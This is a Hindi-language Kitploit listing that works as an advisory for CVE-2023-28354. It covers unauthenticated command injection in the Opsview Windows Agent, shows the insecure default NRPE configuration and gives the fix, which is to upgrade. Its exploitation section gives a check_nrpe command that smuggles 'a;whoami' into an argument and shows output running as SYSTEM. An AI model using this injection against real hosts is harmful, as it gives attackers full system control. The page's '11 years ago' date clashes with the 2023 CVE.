Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/stormfleet/cve-2023-28354
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubstormfleet/cve-2023-28354

CVE-2023-28354

CVE-2023-28354

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-28354

भेद्यता विवरण

Opsview Monitor Agent 6.8 में एक भेद्यता पाई गई है जो एक अप्रमाणित दूरस्थ हमलावर को मनमाने कमांड निष्पादित करने की अनुमति देती है। विंडोज पर एक अप्रमाणित हमलावर डिफ़ॉल्ट Opsview Agent Monitor स्क्रिप्ट को कॉल करते समय कमांड-लाइन एस्केप अनुक्रम प्रदान करके इस भेद्यता का शोषण कर सकता है, जिससे मनमाने सिस्टम कमांड का निष्पादन संभव हो जाता है।

विवरण

विंडोज पर Opsview Agent सेवा डिफ़ॉल्ट रूप से Local System के रूप में चलती है। इस डिफ़ॉल्ट कॉन्फ़िगरेशन में कई NRPE हैंडलर भी शामिल होते हैं, जो प्रशासकों को सिस्टम स्थिति, फ़ाइल आयु या माउंटपॉइंट्स की जाँच करने जैसे पूर्वनिर्धारित कार्यों को निष्पादित करने वाली स्क्रिप्ट को कॉल करने की अनुमति देते हैं। ये हैंडलर आर्गुमेंट्स स्वीकार करने (allow_arguments=1) और कमांड-लाइन एस्केप कैरेक्टर्स (allow_nasty_meta_characters=1) के लिए कॉन्फ़िगर किए गए हैं।

प्रभावित संस्करण में NRPE हैंडलर असुरक्षित रूप से कॉन्फ़िगर किए गए हैं, जो किसी दूरस्थ उपयोगकर्ता द्वारा सीधे PowerShell में स्क्रिप्ट कॉल करने पर कमांड इनपुट और किसी भी आर्गुमेंट को प्रतिध्वनित करते हैं।

एक डिफ़ॉल्ट opsview.ini कॉन्फ़िगरेशन फ़ाइल:

75: [External Script]
76: ;# COMMAND ARGUMENT PROCESSING
77: ;  This option determines whether or not the NRPE daemon will allow clients to specify arguments to commands that are executed.
78: allow_arguments=1
79: 
80: ;# COMMAND ALLOW NASTY META CHARS
81: ;  This option determines whether or not the NRPE daemon will allow clients to specify nasty (as in |`&><'"\[]{}) characters in arguments.
82: allow_nasty_meta_chars=1

[...]snip[...]

94: [NRPE Handlers]
95: check_mountpoint=cmd /c echo scripts\check_mountpoint.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
96: check_services_orig=cmd /c echo scripts\check_services.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
97: check_services=scripts\check_services.exe $ARG1$
98: check_clustergroup=cmd /c echo scripts\check_clustergroup.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
99: check_windows_base_orig=cmd /c echo scripts\check_windows_base.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
100: check_windows_base=scripts\check_windows_base.exe $ARG1$
101: check_msmq=cmd /c echo scripts\check_msmq.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
102: check_ms_iis=cmd /c echo scripts\check_ms_iis.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
103: check_ms_dns=cmd /c echo scripts\check_ms_dns.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
104: check_ms_sql_database_states=cmd /c echo scripts\check_ms_sql_database_states.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
105: check_ms_sql_performance=cmd /c echo scripts\check_ms_sql_performance.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
106: check_ms_sql_system=cmd /c echo scripts\check_ms_sql_system.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
107: check_ms_hyperv_server=cmd /c echo scripts\check_ms_hyperv_server.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
108: check_microsoft_exchange2016_backpressure=cmd /c echo scripts\check_microsoft_exchange2016_backpressure.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
109: check_microsoft_exchange2013_backpressure=cmd /c echo scripts\check_microsoft_exchange2013_backpressure.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
110: check_microsoft_exchange_counters=cmd /c echo scripts\check_microsoft_exchange_counters.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
111: check_microsoft_exchange=cmd /c echo scripts\check_microsoft_exchange.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
112: check_active_directory=cmd /c echo scripts\check_active_directory.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
113: check_windows_updates=cmd /c echo scripts\check_windows_updates.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
114: check_file_age=cmd /c echo scripts\checkfileage.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
115: check_counter=cmd /c echo scripts\check_counter.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
116: check_xen=cmd /c echo scripts\check_xen.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
117: check_horizon=cmd /c echo scripts\check_horizon.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
118: check_xencloud=cmd /c echo scripts\check_xencloud.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -
119: check_wineventlog=cmd /c echo scripts\check_wineventlogn.ps1 $ARG1$; exit($lastexitcode) | PowerShell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command -

शोषण

लिनक्स से डिफ़ॉल्ट इंस्टॉलेशन पर हमला करने के लिए, किसी ज्ञात-हैंडलर से संवाद करने के लिए Nagios check_nrpe उपयोगिता का उपयोग किया जा सकता है, जो आर्गुमेंट के रूप में एक कमांड-लाइन एस्केप और वांछित कमांड को दूरस्थ रूप से चलाने के लिए प्रदान करता है।

उदाहरण के लिए:

$ /usr/lib/nagios/plugins/check_nrpe -H 192.168.0.15 -c check_file_age -a "a;whoami"
CRITICAL: File a does not exist
nt authority\system

Screencast from 2025-04-10 10-52-02.webm

प्रभावित उत्पाद

Opsview Windows Agent 28-09-2022, और x64 तथा Win32 रिलीज़।

भेद्य उत्पाद के लिए दूरस्थ फ़िंगरप्रिंट: OpsviewAgent 0.3.9.700 2022-09-28; osname=windows

समाधान

Opsview Windows Agent 09-03-2023 रिलीज़ में अपग्रेड करें।

नोट: ITRS के सूचना के अनुसार Opsview Agent को आगे कोई अपडेट प्राप्त नहीं होगा। इसके बजाय ITRS Infrastructure Agent में अपग्रेड करने की अनुशंसा की जाती है।

डाउनलोड लिंक

टूल डाउनलोड करें